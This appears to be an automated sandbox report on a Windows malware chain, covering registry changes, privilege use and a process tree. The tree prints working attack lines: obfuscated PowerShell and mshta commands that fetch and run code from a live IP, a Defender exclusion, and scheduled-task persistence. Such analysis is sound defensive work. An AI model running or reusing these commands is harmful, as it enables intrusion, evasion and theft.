\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Modifies registry class 2 IoCs
Processes:
powershell.exefirefox.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exeskotes.exeL.exeskotes.exee4e8d8a322.exepowershell.exepowershell.exec1636e04c0.exepowershell.exe32ece984f9.exepowershell.exechrome.exefdd7619df5.exea3c615add8.exeFunnyJellyfish.tmpregsvr32.exepowershell.exeLB31.exepowershell.exepowershell.exepid Process 2860 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe 2860 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe 4960 skotes.exe 4960 skotes.exe 3836 L.exe 3836 L.exe 3564 skotes.exe 3564 skotes.exe 1212 e4e8d8a322.exe 1212 e4e8d8a322.exe 4540 powershell.exe 4540 powershell.exe 2180 powershell.exe 2180 powershell.exe 6980 c1636e04c0.exe 6980 c1636e04c0.exe 5244 powershell.exe 5244 powershell.exe 5244 powershell.exe 3824 32ece984f9.exe 3824 32ece984f9.exe 6924 powershell.exe 6924 powershell.exe 6924 powershell.exe 632 chrome.exe 632 chrome.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 6680 a3c615add8.exe 6680 a3c615add8.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 6680 a3c615add8.exe 6680 a3c615add8.exe 6680 a3c615add8.exe 5520 FunnyJellyfish.tmp 5520 FunnyJellyfish.tmp 5540 regsvr32.exe 5540 regsvr32.exe 5540 regsvr32.exe 5540 regsvr32.exe 5540 regsvr32.exe 5540 regsvr32.exe 6168 powershell.exe 6168 powershell.exe 6168 powershell.exe 5788 LB31.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 5788 LB31.exe 5788 LB31.exe 2388 powershell.exe 2388 powershell.exe 5788 LB31.exe 2388 powershell.exe 5788 LB31.exe 5788 LB31.exe 5788 LB31.exe 5788 LB31.exe 5788 LB31.exe 5788 LB31.exe 5788 LB31.exe 5788 LB31.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid Process 632 chrome.exe 632 chrome.exe 632 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exetaskkill.exechrome.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exefirefox.exea3c615add8.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 4540 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 2376 RegSvcs.exe Token: SeDebugPrivilege 5244 powershell.exe Token: SeDebugPrivilege 6924 powershell.exe Token: SeDebugPrivilege 5788 taskkill.exe Token: SeShutdownPrivilege 632 chrome.exe Token: SeCreatePagefilePrivilege 632 chrome.exe Token: SeDebugPrivilege 5264 taskkill.exe Token: SeDebugPrivilege 6424 taskkill.exe Token: SeDebugPrivilege 4280 taskkill.exe Token: SeDebugPrivilege 5208 taskkill.exe Token: SeDebugPrivilege 6080 firefox.exe Token: SeDebugPrivilege 6080 firefox.exe Token: SeDebugPrivilege 6680 a3c615add8.exe Token: SeDebugPrivilege 6168 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeIncreaseQuotaPrivilege 6168 powershell.exe Token: SeSecurityPrivilege 6168 powershell.exe Token: SeTakeOwnershipPrivilege 6168 powershell.exe Token: SeLoadDriverPrivilege 6168 powershell.exe Token: SeSystemProfilePrivilege 6168 powershell.exe Token: SeSystemtimePrivilege 6168 powershell.exe Token: SeProfSingleProcessPrivilege 6168 powershell.exe Token: SeIncBasePriorityPrivilege 6168 powershell.exe Token: SeCreatePagefilePrivilege 6168 powershell.exe Token: SeBackupPrivilege 6168 powershell.exe Token: SeRestorePrivilege 6168 powershell.exe Token: SeShutdownPrivilege 6168 powershell.exe Token: SeDebugPrivilege 6168 powershell.exe Token: SeSystemEnvironmentPrivilege 6168 powershell.exe Token: SeRemoteShutdownPrivilege 6168 powershell.exe Token: SeUndockPrivilege 6168 powershell.exe Token: SeManageVolumePrivilege 6168 powershell.exe Token: 33 6168 powershell.exe Token: 34 6168 powershell.exe Token: 35 6168 powershell.exe Token: 36 6168 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeIncreaseQuotaPrivilege 2388 powershell.exe Token: SeSecurityPrivilege 2388 powershell.exe Token: SeTakeOwnershipPrivilege 2388 powershell.exe Token: SeLoadDriverPrivilege 2388 powershell.exe Token: SeSystemProfilePrivilege 2388 powershell.exe Token: SeSystemtimePrivilege 2388 powershell.exe Token: SeProfSingleProcessPrivilege 2388 powershell.exe Token: SeIncBasePriorityPrivilege 2388 powershell.exe Token: SeCreatePagefilePrivilege 2388 powershell.exe Token: SeBackupPrivilege 2388 powershell.exe Token: SeRestorePrivilege 2388 powershell.exe Token: SeShutdownPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeSystemEnvironmentPrivilege 2388 powershell.exe Token: SeRemoteShutdownPrivilege 2388 powershell.exe Token: SeUndockPrivilege 2388 powershell.exe Token: SeManageVolumePrivilege 2388 powershell.exe Token: 33 2388 powershell.exe Token: 34 2388 powershell.exe Token: 35 2388 powershell.exe Token: 36 2388 powershell.exe Token: SeIncreaseQuotaPrivilege 2388 powershell.exe Token: SeSecurityPrivilege 2388 powershell.exe Token: SeTakeOwnershipPrivilege 2388 powershell.exe Token: SeLoadDriverPrivilege 2388 powershell.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
Processes:
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exefdd7619df5.exechrome.exefirefox.exeFunnyJellyfish.tmppid Process 2860 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 632 chrome.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5520 FunnyJellyfish.tmp -
Suspicious use of SendNotifyMessage 34 IoCs
Processes:
fdd7619df5.exefirefox.exepid Process 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 6080 firefox.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe 5900 fdd7619df5.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
firefox.exepid Process 6080 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exeskotes.exefile.exewscript.exepowershell.exepowershell.exeWScript.execmd.exemshta.exepowershell.exefdd7619df5.exee4e8d8a322.exechrome.exedescription pid Process procid_target PID 2860 wrote to memory of 4960 2860 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe 83 PID 2860 wrote to memory of 4960 2860 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe 83 PID 2860 wrote to memory of 4960 2860 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe 83 PID 4960 wrote to memory of 3836 4960 skotes.exe 89 PID 4960 wrote to memory of 3836 4960 skotes.exe 89 PID 4960 wrote to memory of 3836 4960 skotes.exe 89 PID 4960 wrote to memory of 1212 4960 skotes.exe 93 PID 4960 wrote to memory of 1212 4960 skotes.exe 93 PID 4960 wrote to memory of 1212 4960 skotes.exe 93 PID 4960 wrote to memory of 4024 4960 skotes.exe 94 PID 4960 wrote to memory of 4024 4960 skotes.exe 94 PID 4024 wrote to memory of 4600 4024 file.exe 95 PID 4024 wrote to memory of 4600 4024 file.exe 95 PID 4600 wrote to memory of 2180 4600 wscript.exe 96 PID 4600 wrote to memory of 2180 4600 wscript.exe 96 PID 4600 wrote to memory of 4540 4600 wscript.exe 97 PID 4600 wrote to memory of 4540 4600 wscript.exe 97 PID 2180 wrote to memory of 2904 2180 powershell.exe 100 PID 2180 wrote to memory of 2904 2180 powershell.exe 100 PID 4540 wrote to memory of 2764 4540 powershell.exe 101 PID 4540 wrote to memory of 2764 4540 powershell.exe 101 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 4540 wrote to memory of 2376 4540 powershell.exe 102 PID 2904 wrote to memory of 2116 2904 WScript.exe 103 PID 2904 wrote to memory of 2116 2904 WScript.exe 103 PID 2116 wrote to memory of 2608 2116 cmd.exe 105 PID 2116 wrote to memory of 2608 2116 cmd.exe 105 PID 4960 wrote to memory of 6980 4960 skotes.exe 106 PID 4960 wrote to memory of 6980 4960 skotes.exe 106 PID 4960 wrote to memory of 6980 4960 skotes.exe 106 PID 2608 wrote to memory of 5244 2608 mshta.exe 107 PID 2608 wrote to memory of 5244 2608 mshta.exe 107 PID 5244 wrote to memory of 6924 5244 powershell.exe 224 PID 5244 wrote to memory of 6924 5244 powershell.exe 224 PID 4960 wrote to memory of 3824 4960 skotes.exe 110 PID 4960 wrote to memory of 3824 4960 skotes.exe 110 PID 4960 wrote to memory of 3824 4960 skotes.exe 110 PID 4960 wrote to memory of 5900 4960 skotes.exe 112 PID 4960 wrote to memory of 5900 4960 skotes.exe 112 PID 4960 wrote to memory of 5900 4960 skotes.exe 112 PID 5900 wrote to memory of 5788 5900 fdd7619df5.exe 152 PID 5900 wrote to memory of 5788 5900 fdd7619df5.exe 152 PID 5900 wrote to memory of 5788 5900 fdd7619df5.exe 152 PID 1212 wrote to memory of 632 1212 e4e8d8a322.exe 115 PID 1212 wrote to memory of 632 1212 e4e8d8a322.exe 115 PID 632 wrote to memory of 7040 632 chrome.exe 116 PID 632 wrote to memory of 7040 632 chrome.exe 116 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 PID 632 wrote to memory of 6584 632 chrome.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
RegSvcs.exedescription ioc Process Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
Processes:
RegSvcs.exedescription ioc Process Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1016
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵PID:6924
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll2⤵PID:4404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"3⤵
- Command and Scripting Interpreter: PowerShell
PID:6068
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵PID:4948
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵PID:2544
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe"C:\Users\Admin\AppData\Local\Temp\27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3836
-
-
C:\Users\Admin\AppData\Local\Temp\1007999001\e4e8d8a322.exe"C:\Users\Admin\AppData\Local\Temp\1007999001\e4e8d8a322.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffea362cc40,0x7ffea362cc4c,0x7ffea362cc585⤵PID:7040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,2110629019259059216,17838165839764102631,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:25⤵PID:6584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,2110629019259059216,17838165839764102631,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:35⤵PID:4000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,2110629019259059216,17838165839764102631,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2420 /prefetch:85⤵PID:3088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,2110629019259059216,17838165839764102631,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:15⤵
- Uses browser remote debugging
PID:2280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,2110629019259059216,17838165839764102631,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:15⤵
- Uses browser remote debugging
PID:4776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,2110629019259059216,17838165839764102631,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3336 /prefetch:15⤵
- Uses browser remote debugging
PID:6084
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵PID:64
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5312
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 12964⤵
- Program crash
PID:5560
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update7⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update8⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X9⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6924
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"10⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5788 -
